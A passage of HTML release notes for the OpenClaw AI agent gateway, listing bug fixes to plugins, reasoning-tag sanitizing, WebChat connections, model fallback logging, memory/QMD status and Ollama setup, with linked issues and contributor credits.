<li>Gateway/plugins: start the Gateway in degraded mode when a single plugin entry has invalid schema config, and let <code>openclaw doctor --fix</code> quarantine that plugin config instead of crash-looping every channel. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222538957" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62976" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62976/hovercard" href="https://github.com/openclaw/openclaw/issues/62976">#62976</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312236696" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70371" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70371/hovercard" href="https://github.com/openclaw/openclaw/issues/70371">#70371</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Doraemon-Claw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Doraemon-Claw">@Doraemon-Claw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pksidekyk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pksidekyk">@pksidekyk</a>.</li>
<li>Agents/plugins: skip malformed plugin tools with missing schema objects and report plugin diagnostics, so one broken tool no longer crashes Anthropic agent runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297771760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69423/hovercard" href="https://github.com/openclaw/openclaw/issues/69423">#69423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmnickels/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmnickels">@jmnickels</a>.</li>
<li>Agents/reasoning: recover fully wrapped unclosed <code>&lt;think&gt;</code> replies that would otherwise sanitize to empty text while keeping strict stripping for closed reasoning blocks and unclosed tails after visible text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4033641320" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37696" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37696/hovercard" href="https://github.com/openclaw/openclaw/issues/37696">#37696</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114131932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51915" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51915/hovercard" href="https://github.com/openclaw/openclaw/pull/51915">#51915</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/druide67/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/druide67">@druide67</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/okuyam2y/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/okuyam2y">@okuyam2y</a>.</li>
<li>Control UI/Gateway: bind WebChat handshakes to their active socket and reject post-close server registrations, so aborted connects no longer leave zombie clients or misleading duplicate WebSocket connection logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334957430" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72753/hovercard" href="https://github.com/openclaw/openclaw/issues/72753">#72753</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LumenFromTheFuture/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LumenFromTheFuture">@LumenFromTheFuture</a>.</li>
<li>Agents/fallback: split ambiguous provider failures into <code>empty_response</code>, <code>no_error_details</code>, and <code>unclassified</code>, and add flat fallback-step fields to structured fallback logs so primary-model failures stay visible when later fallbacks also fail. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329919349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71922" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71922/hovercard" href="https://github.com/openclaw/openclaw/issues/71922">#71922</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329116597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71744/hovercard" href="https://github.com/openclaw/openclaw/issues/71744">#71744</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyk-ms/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyk-ms">@andyk-ms</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nikolaykazakovvs-ux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nikolaykazakovvs-ux">@nikolaykazakovvs-ux</a>.</li>
<li>Plugins/Windows: normalize Windows absolute paths before handing bundled plugin modules to Jiti, so Feishu/Lark message sending no longer fails with unsupported <code>c:</code> ESM loader URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335348867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72783/hovercard" href="https://github.com/openclaw/openclaw/issues/72783">#72783</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackychen-png/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackychen-png">@jackychen-png</a>.</li>
<li>CLI/doctor: run bundled plugin runtime-dependency repairs through the async npm installer with spinner/line progress and heartbeat updates, so long <code>openclaw doctor --fix</code> installs no longer look hung in TTY or piped output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335189382" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72775" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72775/hovercard" href="https://github.com/openclaw/openclaw/issues/72775">#72775</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dfpalhano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dfpalhano">@dfpalhano</a>.</li>
<li>Feishu/Windows: normalize bundled channel sidecar loads before Jiti evaluates them, so Feishu outbound sends no longer fail with raw <code>C:</code> ESM loader errors on Windows. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335348867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72783/hovercard" href="https://github.com/openclaw/openclaw/issues/72783">#72783</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackychen-png/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackychen-png">@jackychen-png</a>.</li>
<li>Agents/tools: ignore volatile <code>exec</code> runtime metadata when comparing tool-loop outcomes, so enabled loop detection can stop repeated identical shell-command results instead of resetting on duration, PID, session, or cwd changes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4022477859" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/34574" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/34574/hovercard" href="https://github.com/openclaw/openclaw/issues/34574">#34574</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048349125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41502" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41502/hovercard" href="https://github.com/openclaw/openclaw/pull/41502">#41502</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zcg2021/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zcg2021">@Zcg2021</a>.</li>
<li>Agents/fallback: classify internal live-session model switch conflicts as unknown fallback failures instead of provider overloads, preventing local vLLM endpoints from receiving misleading overloaded cooldowns. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225856098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63229" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63229/hovercard" href="https://github.com/openclaw/openclaw/issues/63229">#63229</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/clawdia-lobster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/clawdia-lobster">@clawdia-lobster</a>.</li>
<li>Discord: let thread sessions inherit the parent channel's session-level <code>/model</code> override as a model-only fallback without enabling parent transcript inheritance. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335010108" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72755" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72755/hovercard" href="https://github.com/openclaw/openclaw/issues/72755">#72755</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a>.</li>
<li>Gateway/plugins: skip stale configured channels whose matching plugin is no longer discoverable, point cleanup at <code>openclaw doctor --fix</code>, and keep unrelated channel typos fatal so one missing channel plugin no longer crash-loops the Gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124825809" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53311" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53311/hovercard" href="https://github.com/openclaw/openclaw/issues/53311">#53311</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/futhgar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/futhgar">@futhgar</a>.</li>
<li>Control UI: keep session-specific assistant identity loads authoritative after WebSocket connect, so non-main agent chat sessions do not show the main agent name in the header after bootstrap refreshes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335228084" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72776/hovercard" href="https://github.com/openclaw/openclaw/issues/72776">#72776</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rockytian-top/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rockytian-top">@rockytian-top</a>.</li>
<li>Agents/Qwen: preserve exact custom <code>modelstudio</code> provider configs with foreign <code>api</code> owners so explicit OpenAI-compatible Model Studio endpoints no longer get normalized into the bundled Qwen plugin path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241479558" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64483" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64483/hovercard" href="https://github.com/openclaw/openclaw/issues/64483">#64483</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FiredMosquito831/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FiredMosquito831">@FiredMosquito831</a>.</li>
<li>MCP/bundle-mcp: normalize CLI-native <code>type: "http"</code> MCP server entries to OpenClaw <code>transport: "streamable-http"</code> on save, repair existing configs with doctor, and keep embedded Pi from falling back to legacy SSE GET-first startup for those servers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335050401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72757" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72757/hovercard" href="https://github.com/openclaw/openclaw/issues/72757">#72757</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Studioscale/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Studioscale">@Studioscale</a>.</li>
<li>OpenCode: expose Anthropic Opus/Sonnet 4.x thinking levels for proxied Claude models, so <code>/think xhigh</code>, <code>/think adaptive</code>, and <code>/think max</code> validate consistently with the direct Anthropic provider. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334548834" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72729" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72729/hovercard" href="https://github.com/openclaw/openclaw/issues/72729">#72729</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/haishmg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/haishmg">@haishmg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aaajiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aaajiao">@aaajiao</a>.</li>
<li>Media-understanding/audio: migrate deprecated <code>{input}</code> placeholders in legacy <code>audio.transcription.command</code> configs to <code>{{MediaPath}}</code>, so custom audio transcribers no longer receive the literal placeholder after doctor repair. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335120301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72760" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72760/hovercard" href="https://github.com/openclaw/openclaw/issues/72760">#72760</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/krisfanue3-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/krisfanue3-hash">@krisfanue3-hash</a>.</li>
<li>Ollama/WSL2: warn when GPU-backed WSL2 installs combine CUDA visibility with an autostarting <code>ollama.service</code> using <code>Restart=always</code>, and document the systemd, <code>.wslconfig</code>, and keep-alive mitigation for crash loops. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4205722264" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61022" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61022/hovercard" href="https://github.com/openclaw/openclaw/pull/61022">#61022</a>; fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206448739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61185" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61185/hovercard" href="https://github.com/openclaw/openclaw/issues/61185">#61185</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yhyatt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yhyatt">@yhyatt</a>.</li>
<li>Ollama/onboarding: de-dupe suggested bare local models against installed <code>:latest</code> tags and skip redundant pulls, so setup shows the installed model once and no longer says it is downloading an already available model. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290796328" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68952" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68952/hovercard" href="https://github.com/openclaw/openclaw/issues/68952">#68952</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tleyden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tleyden">@tleyden</a>.</li>
<li>Memory-core/doctor: keep <code>doctor.memory.status</code> on the cached path by default and only run live embedding pings for explicit deep probes, preventing slow local embedding backends from blocking Gateway status checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328026042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71568" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71568/hovercard" href="https://github.com/openclaw/openclaw/issues/71568">#71568</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/apex-system/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/apex-system">@apex-system</a>.</li>
<li>Memory/QMD: group same-source collections into one QMD search invocation when the installed QMD supports multiple <code>-c</code> filters, while keeping older QMD builds on the per-collection fallback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332566839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72484" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72484/hovercard" href="https://github.com/openclaw/openclaw/issues/72484">#72484</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332567282" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72485" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72485/hovercard" href="https://github.com/openclaw/openclaw/pull/72485">#72485</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300148574" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69583" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69583/hovercard" href="https://github.com/openclaw/openclaw/pull/69583">#69583</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeroaltitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeroaltitude">@zeroaltitude</a>.</li>
<li>Memory/QMD: accept QMD status vector-count variants such as <code>Vectors = 42</code>, <code>Vectors:42</code>, and <code>Vectors: 42 embedded</code>, so <code>memory status --deep</code> no longer reports embeddings unavailable for healthy QMD wrappers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230927724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63652/hovercard" href="https://github.com/openclaw/openclaw/issues/63652">#63652</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231262054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63678" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63678/hovercard" href="https://github.com/openclaw/openclaw/pull/63678">#63678</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/apoapostolov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/apoapostolov">@apoapostolov</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WarrenJones/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WarrenJones">@WarrenJones</a>.</li>
<li>Memory/QMD: skip QMD vector status probes and embedding maintenance in lexical <code>searchMode: "search"</code>, so BM25-only QMD setups on ARM do not trigger llama.cpp/Vulkan builds during status checks or embed cycles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4189583069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59234" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59234/hovercard" href="https://github.com/openclaw/openclaw/issues/59234">#59234</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4267984707" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67113" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67113/hovercard" href="https://github.com/openclaw/openclaw/issues/67113">#67113</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PrinceOfEgypt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PrinceOfEgypt">@PrinceOfEgypt</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vksh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vksh07">@Vksh07</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Snipe76/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Snipe76">@Snipe76</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NomLom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NomLom">@NomLom</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/t4r3e2q1-commits/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/t4r3e2q1-commits">@t4r3e2q1-commits</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dmak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dmak">@dmak</a>.</li>
<li>Memory/QMD: report the live watcher dirty state in memory status, so changed QMD-backed memory files show as dirty until the queued sync finishes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4200061352" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60244" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60244/hovercard" href="https://github.com/openclaw/openclaw/issues/60244">#60244</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xinzf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xinzf">@xinzf</a>.</li>
<li>Compaction: skip oversized pre-compaction checkpoint snapshots and prune duplicate long user turns from compaction input and rotated successor transcripts, preventing retry storms from being preserved across checkpoint cycles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335315619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72780/hovercard" href="https://github.com/openclaw/openclaw/issues/72780">#72780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SweetSophia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SweetSophia">@SweetSophia</a>.</li>
<li>Control UI/Cron: render cron job prompts and run summaries as sanitized markdown in the dashboard, with full-width block content, safer link clicks, and no duplicate error text when a failed run has no summary. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084972176" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48504" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48504/hovercard" href="https://github.com/openclaw/openclaw/pull/48504">#48504</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garethdaine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garethdaine">@garethdaine</a>.</li>
<li>Control UI/Gateway: preserve WebChat client version labels across localhost, 127.0.0.1, and IPv6 loopback aliases on the same port, avoiding misleading <code>vcontrol-ui</code> connection logs while investigating duplicate-message reports. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334957430" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72753/hovercard" href="https://github.com/openclaw/openclaw/issues/72753">#72753</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334796900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72742" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72742/hovercard" href="https://github.com/openclaw/openclaw/issues/72742">#72742</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LumenFromTheFuture/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LumenFromTheFuture">@LumenFromTheFuture</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/allesgutefy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/allesgutefy">@allesgutefy</a>.</li>
<li>Agents/reasoning: treat orphan closing reasoning tags with following answer text as a privacy boundary across delivery, history, streaming, and Control UI sanitizers so malformed local-model output cannot leak chain-of-thought text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4267622881" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67092/hovercard" href="https://github.com/openclaw/openclaw/issues/67092">#67092</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnildoSilva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnildoSilva">@AnildoSilva</a>.</li>
<li>Memory-core: run one-shot memory CLI commands through transient builtin and QMD managers so <code>memory index</code>, <code>memory status --index</code>, and <code>memory search</code> no longer start long-lived file watchers that can hit macOS <code>EMFILE</code> limits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187752224" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59101" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59101/hovercard" href="https://github.com/openclaw/openclaw/issues/59101">#59101</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095576345" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49851" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49851/hovercard" href="https://github.com/openclaw/openclaw/pull/49851">#49851</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbear469210-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbear469210-coder">@mbear469210-coder</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maoyuanxue/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maoyuanxue">@maoyuanxue</a>.</li>
<li>Agents/ACP: ship the Claude ACP adapter with OpenClaw and require Claude result messages before idle can complete a prompt, preventing parent agents from waking early on long-running <code>sessions_spawn(runtime: "acp", agentId: "claude")</code> children. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330496541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72080" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72080/hovercard" href="https://github.com/openclaw/openclaw/issues/72080">#72080</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/siavash-saki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/siavash-saki">@siavash-saki</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iannwu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iannwu">@iannwu</a>.</li>
<li>CLI/tasks: route <code>tasks --json</code>, <code>tasks list --json</code>, and <code>tasks audit --json</code> through a lean JSON path so read-only task inspection no longer loads unrelated plugin/runtime command graphs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258741985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66238" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66238/hovercard" href="https://github.com/openclaw/openclaw/issues/66238">#66238</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ChuckChambers/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ChuckChambers">@ChuckChambers</a>.</li>
<li>Memory-core: re-resolve the active runtime config whenever <code>memory_search</code> or <code>memory_get</code> executes, so provider changes made by <code>config.patch</code> stop leaving stale embedding backends behind in existing tool instances. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206081616" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61098" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61098/hovercard" href="https://github.com/openclaw/openclaw/issues/61098">#61098</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BradGroux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BradGroux">@BradGroux</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</li>
